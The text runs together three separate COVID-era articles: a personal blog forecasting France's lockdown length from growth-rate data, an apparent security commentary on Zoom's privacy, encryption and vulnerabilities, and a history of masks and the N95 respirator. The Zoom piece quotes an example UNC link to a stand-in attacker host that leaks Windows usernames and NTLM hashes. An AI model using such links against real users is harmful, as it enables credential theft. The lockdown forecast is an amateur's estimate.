One of my activities during the lockdown here in France is trying to predict how much time will the lockdown last. The data I'm using comes from here.
Below is a plot of the rate of growth of Covid-19 in Hubei, Italy, and France, starting from the day each region has started its lockdown. The rate of growth at a given day is the number of new cases on this day, as a percentage of the number of cases from the previous day. The rate of growth is constant for an exponential evolution, and is 0 when there is no more growth. (Mathematically, it is the derivative of the function divided by the function itself.)
Hubei has some statistical aberrations which make the plot goes wild at some places. They may be the result of changes from one counting method to another. For example, at some point they started adding people clinically diagnosed with symptoms of pneumonia (most likely Covid-19) on top of those who tested positive to SARS-Cov-2.
What we see in the plot is that:
Locking down works. For each of the countries, locking down eventually brings the growth significantly down. Italy has been on a smooth decline since the beginning of their lockdown. You may read articles in the press about how they're finally beating the virus, which is just a way of saying that the rate of growth has decreased under some arbitrary threshold. It has been decreasing from the start.
It takes time to kill growth. Hubei needed 30 days for the growth to almost come to a stop.
Even if they don't start at the same rate of growth, it looks that each country is ultimately going to take around 30 or 40 days to kill growth.
Why does it take so much time? I have 2 explanations for it.
Explanation number 1 is the incubation period of Covid-19, which ranges between 5 days and 14 days. This means that the last people who have been contaminated just before the lockdown (which is much of the contaminated people, because of exponential growth) will start going through the disease between 5 days and 14 days in the lockdown. Once they are sick, the symptoms tend to peak between 2 and 3 days in the illness, which is the moment they reach for medical assistance and get tested. So it is expected that the measured number of contaminated people could continue growing up to 17 days after the start of the lockdown.
17 days are still lesser than the 30 days we're observing here, which brings me to the second explanation: the lockdown is not perfect. Some people cannot work from home and still go to work. People need to buy groceries, and go to the shop. People order deliveries, with packing touched by other people. People get sick for various reasons, so they do to the doctor, where other people are waiting. And so on and so forth.
The fact that there are contaminations even during the lockdown seems to be corroborated by another metric, which is: once there is no more growth, how many of all the people who have tested positive are still sick? The answer is: most of them. The following graph shows the number of unrecovered cases of Covid-19 against the total number of cases in Hubei after 30 days of lockdown. That is, once there is almost no more growth.
We see that even when the virus has stopped spreading, a large majority of all Covid-19 cases are still positive, and it takes another 30 days before most of them recover and there is only a small minority which is still positive.
My initial reaction was that it is no problem to stop the lockdown after the first month, you just have to keep the still-ill locked down until they recover. The problem is that it is well-known that the number of measured cases is way lesser than the number of total cases, because only the worst cases get tested. So we must imagine that this graph only represent a subset of the entire set of Covid-19 cases, and their sizes evolve proportionally. So if you let out people at Day 30, you're actually letting out people among a sh#tload of people who are positive, and therefore at risk of spreading the virus again.
You can read the complete Hubei lockdown timeline here, from which I extract 3 bullet points:
23 January: lockdown
6 March: first day with 0 new case
27 March: lockdown lifted
The rest of the world waited for the last moment to put lockdowns in place, and started experiencing hindsight bias about the fact that it was pretty much announced by China one month before. If this time we stop playing the game of "in our country it's going to be different than in China", then the prediction for the duration of the lockdown is: 2 months.
Over the past few weeks, Zoom's use has exploded since it became the video conferencing platform of choice in today's COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.
In general, Zoom's problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.
Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.
The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.
Last month, Zoom's privacy policy contained this bit:
Does Zoom sell Personal Data? Depends what you mean by "sell." We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don't think most of our users would see us as selling their information, as that practice is commonly understood.
"Depends what you mean by 'sell.'" "...most of our users would see us as selling..." "...as that practice is commonly understood." That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who "download[ed] an app from the Marketplace" remember consenting to them giving your personal data to third parties? I don't.
Doc Searls has been alloverthis, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.
We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.
[...]
We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.
There's lots more. It's better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages "marketing websites," which means it's still using third-party trackers and surveillance based advertising. (Honestly, Zoom, just stop doing it.)
Now security: Zoom's security is at best sloppy, and malicious at worst. Motherboard reported that Zoom's iPhone app was sending user data to Facebook, even if the user didn't have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:
"We originally implemented the 'Login with Facebook' feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data," Zoom told Motherboard in a statement on Friday.
This isn't the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user's web camera without the user's knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.
On 4/1, we learned that Zoom for Windows can be used to steal users' Window credentials.
Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they're using. The Zoom app for Windows automatically converts these so-called universal naming convention strings -- such as \\attacker.example.com/C$ -- into clickable links. In the event that targets click on those links on networks that aren't fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.
On 4/2, we learned that Zoom secretly displayed data from people's LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)
I'm sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.
But it gets worse. Zoom's encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn't. It only provides link encryption, which means everything is unencrypted on the company's servers. From the Intercept:
In Zoom's white paper, there is a list of "pre-meeting security capabilities" that are available to the meeting host that starts with "Enable an end-to-end (E2E) encrypted meeting." Later in the white paper, it lists "Secure a meeting with E2E encryption" as an "in-meeting security capability" that's available to meeting hosts. When a host starts a meeting with the "Require Encryption for 3rd Party Endpoints" setting enabled, participants see a green padlock that says, "Zoom is using an end to end encrypted connection" when they mouse over it.
But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, "Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection."
They're also lying about the type of encryption. On 4/3, Citizen Lab reported
Zoom documentation claims that the app uses "AES-256" encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.
The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber's company, are outside of China.
I'm okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.
And that China connection is worrisome. Citizen Lab again:
Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom's software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.
Or from Chinese programmers slipping backdoors into the code at the request of the government.
Finally, bad user configuration. Zoom has a lot of options. The defaults aren't great, and if you don't configure your meetings right you're leaving yourself open to all sort of mischief.
"Zoombombing" is the most visible problem. People are finding open Zoom meetings, classes, and events: joining them, and sharing their screens to broadcast offensive content -- porn, mostly -- to everyone. It's awful if you're the victim, and a consequence of allowing any participant to share their screen.
Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn't make the meeting ID long enough to prevent someone from randomly trying them, looking for meetings. This isn't new; Checkpoint Research reported this last summer. Instead of making the meeting IDs longer or more complicated -- which it should have done -- it enabled meeting passwords by default. Of course most of us don't use passwords, and there are now automatic tools for finding Zoom meetings.
For help securing your Zoom sessions, Zoom has a good guide. Short summary: don't share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.
That's what we know about Zoom's privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.
Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it's in the spotlight, it's all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let's see if that's anything more than a PR move.
In the meantime, you should either lock Zoom down as best you can, or -- better yet -- abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.
It’s hard to think of a symbol of COVID-19 more fraught than the N95 respirator. The mask fits tightly around the face and is capable of filtering 95% of airborne particles, such as viruses, from the air, which other protective equipment (such as surgical masks) can’t do. It’s a life-saving device that is now in dangerously short supply. As such, it has come to represent the extreme challenges of the global response to COVID-19.
advertisement
advertisement
How did a flimsy polymer cup become the most significant health device of the 21st century? It all started in 1910 with a little-known doctor who wanted to save the world from one of the worst diseases ever known.
The first masks were about stopping smell
Going back even further—long before we understood that bacteria and viruses could float through the air and make us sick—people improvised masks to cover their faces, says Christos Lynteris. Lynteris is a senior lecturer at the Department of Social Anthropology at the University of St. Andrews, who is an expert in medical mask history.
He points to Renaissance-era paintings where people cover their noses with handkerchiefs to avoid illness. There are even paintings from Marseilles in 1720, which was the epicenter of the bubonic plague, that show gravediggers and people handling bodies with cloth around their faces, even though the plague was spread by the bites of fleas that traveled on rats.
“It was not meant to be against the contagion,” says Lynteris of the practice. “The reason these people were wearing cloth around their mouths and noses was, at the time, they generally believed diseases like the plague were miasma, or gases emanating from the ground. It wasn’t to protect you from another person, they believed plague was in the atmosphere—corrupt air.”
Copper engraving of Dr. Schnabel, a plague doctor in 17th century Rome. [Image: Wiki Commons]The theory of miasma is what drove the design of the infamous plague masks seen across Europe in the 1600s, which would be worn by doctors who identified the plague and marked the infected by tapping them with a stick. These elongated masks resembled large bird beaks and had two nostril ports at the edge of the mask that could be loaded with incense. People thought that by protecting themselves from the smell of the plague, they’d be protected from the plague itself.
“The stench causes disease. This [thought] continued all the way to the early 19th century,” says Lynteris. (It’s worth noting that, 200 years later, a French physician named Antoine Barthélemy Clot-Bey argued that the bird-like plague masks themselves were responsible for the spread of the plague because they made people scared, and a frightened body was at greater risk for disease.)
advertisement
By the late 1870s, scientists learned about bacteria. Miasma fell from fashion as the modern field of microbiology emerged. And yet, what came next looked a whole lot like what came before—minus the creepy birds. “We often think of scientific paradigm shifts leading to breaks, but all the technologies used against germs by the end of the 19th century were [riffs] on technologies from miasma.”
A glorified handkerchief
Doctors started wearing the first surgical masks in 1897. They weren’t much more than a glorified handkerchief tied around one’s face, and they weren’t designed to filter airborne disease—that’s still not the point of surgical masks today. They were (and are) used to prevent doctors from coughing or sneezing droplets onto wounds during surgery.
This distinction between a mask and a respirator is important. It’s why healthcare professionals are upset that they’re being instructed to wear surgical masks when respirators are unavailable. Masks are not only made of different materials; they fit loosely on the face, so that particles can come in from the side. Respirators create an airtight seal so they actually filter inhalation.
The first modern respirator is born from plague—and racismHealthcare workers in “anti-plague masks” during the 1911 Manchurian plague. [Photo: courtesy University of Cambridge/Centre for Research in the Arts, Humanities and Social Sciences (CRASSH, The University of Cambridge)/The University of Hong Kong Libraries]In the fall of 1910, a plague broke out across Manchuria—what we know now as Northern China—which was broken up in politically complex jurisdictions shared between China and Russia.
“It’s apocalyptic. Unbelievable. It kills 100% of those infected, no one survives. And it kills them within 24 to 48 hours of the first symptoms,” says Lynteris. “No one has come across something like this in modern times, and it is similar to the descriptions of Black Death.”
What followed was a scientific arms race, to deduce what was causing the plague and stop it. “Both Russia and China want to prove themselves worthy and scientific enough, because that would lead to a claim of sovereignty,” says Lynteris. “Whomever is scientific enough should be given control of this rich and important area.”
advertisement
The Chinese Imperial Court brought in a doctor named Lien-teh Wu to head its efforts. He was born in Penang and studied medicine at Cambridge. Wu was young, and he spoke lousy Mandarin. In a plague that quickly attracted international attention and doctors from around the world, he was “completely unimportant,” according to Lynteris. But after conducting an autopsy on one of the victims, Wu determined that the plague was not spread by fleas, as many suspected, but through the air.
Expanding upon the surgery masks he’d seen in the West, Wu developed a hardier mask from gauze and cotton, which wrapped securely around one’s face and added several layers of cloth to filter inhalations. His invention was a breakthrough, but some doctors still doubted its efficacy.
“There’s a famous incident. He’s confronted by a famous old hand in the region, a French doctor [Gérald Mesny] . . . and Wu explains to the French doctor his theory that plague is pneumonic and airborne,” Lynteris says. “And the French guy humiliates him . . . and in very racist terms says, ‘What can we expect from a Chinaman?’ And to prove this point, [Mesny] goes and attends the sick in a plague hospital without wearing Wu’s mask, and he dies in two days with plague.”
Other doctors in the region quickly developed their own masks. “Some are . . . completely strange things,” Lynteris says. “Hoods with glasses, like diving masks.”
But Wu’s mask won out because in empirical testing, it protected users from bacteria. According to Lynteris, it was also a great design. It could be constructed by hand out of materials that were cheap and in ready supply. Between January and February of 1911, mask production ramped up to unknown numbers. Medical staff wore them, soldiers wore them, and some everyday people wore them, too. Not only did that help thwart the spread of the plague; the masks became a symbol of modern medical science looking an epidemic right in the eye.
Wu’s mask quickly became an icon through international newspaper reports. “The mask was a very novel thing . . . it had an effect of strangeness, which the press loved, but you imagine a black-and-white photograph with a white mask—it reads well,” says Lynteris. “It’s a marketing success.”
advertisement
A streetcar conductor and passenger in Seattle wearing masks during the 1918 pandemic. [Photo: Wiki Commons]When the Spanish flu arrived in 1918, Wu’s mask was well-known among scientists and even much of the public. Companies around the globe increased production of similar masks to help abate the spread of flu.
The N95 is made for industries but arrives just in time to hospitals
The N95 mask is a descendant of Wu’s design. Through World War I and World War II, scientists invented air-filtering gas masks that wrapped around your entire head to clean the air supply. Similar masks, loaded with fiberglass filters, began to be used in the mining industry to prevent black lung.
“All the respirators were these giant, gas mask-looking things,” says Nikki McCullough, an occupational health and safety leader at 3M, which manufactures N95 respirators. “You’d wash them out at night and you could wear them again.”
[Photo: 3M]
This equipment saved lives, but it was burdensome, and a large reason why were the filters. The fiberglass required a lot of effort to breathe, and the full head enclosures were hot to wear. By the 1950s, scientists began to understand the dangers of inhaling asbestos, but people working with asbestos preferred not to wear bulky respirator masks. Imagine working in construction in 85-degree heat and having your head wrapped in rubber to protect yourself from an invisible threat.
So in the 1970s, the Bureau of Mines and the National Institute for Occupational Safety and Health teamed up on creating the first criteria for what they called “single use respirators.” The first single-use N95 “dust” respirator as we know it was developed by 3M, according to the company, and approved on May 25, 1972. Instead of fiberglass, the company repurposed a technology it had developed for making stiffer gift ribbons into a filter, by taking a melted polymer and air-blasted it into layers of tiny fibers. “They look like somebody dropped a bunch of sticks—and they have huge spaces between them,” says McCullough.
As particles, whether silica or viruses, fly into this maze of sticks, they get stuck making turns. 3M also added an electrostatic charge to the material, so even smaller particles find themselves pulled toward the fibers. Meanwhile, because there are so many big holes, breathing is easy.
advertisement
The longer you wear an N95 respirator, the more efficient it becomes at filtering out particles. More particles just help filter more particles. But breathing becomes more difficult over time as those gaping holes between the fibers get clogged up with particles, which is why an N95 respirator can’t be worn for more than about eight hours at a time in a very dusty environment. It doesn’t stop filtering; it just prevents you from breathing comfortably.
N95 respirators were used in industrial applications for decades before the need for a respirator circled back to clinical settings in the 1990s with the rise of drug-resistant tuberculosis. HIV had a lot to do with its spread across immunocompromised patients, but tuberculosis infected many healthcare workers, too. To stop its airborne spread, N95 standards were updated for healthcare settings, and doctors began wearing them when helping tuberculosis patients. Even still, respirators are rarely used in hospitals to this day because it’s only outbreaks like COVID-19 that necessitate so much protection.
As Lynteris and many others point out, the respirator never really faded from significance in China. Wu went on to found China’s version of the CDC, narrowly miss winning a Nobel Prize, and be featured in many biographies (including his own autobiography). More recently, during the SARS outbreak, people in China wore facial protection to prevent the spread of illness. Then as pollution took over cities like Beijing, they wore respirators to filter pollution.
The N95 respirator isn’t perfect. It isn’t designed to seal well to the face of children or those with facial hair, and if it doesn’t seal, it doesn’t work as advertised. Furthermore, the N95 variants that are worn in high-risk operating rooms don’t have an exhalation valve, so they can get particularly hot to wear.
But the N95 respirator evolved over hundreds of years in response to multiple crises. That evolution will only continue through and beyond the COVID-19 pandemic. McCullough says that 3M is constantly reevaluating the N95 respirator, tweaking everything from its filters to its ergonomics. “My mom would say they look pretty much the same [as in 1972], but we want them to look simple so they’re easy and intuitive to use,” says McCullough. “We’re always improving the technology. We have thousands of scientists at 3M working on [it].”
Log in
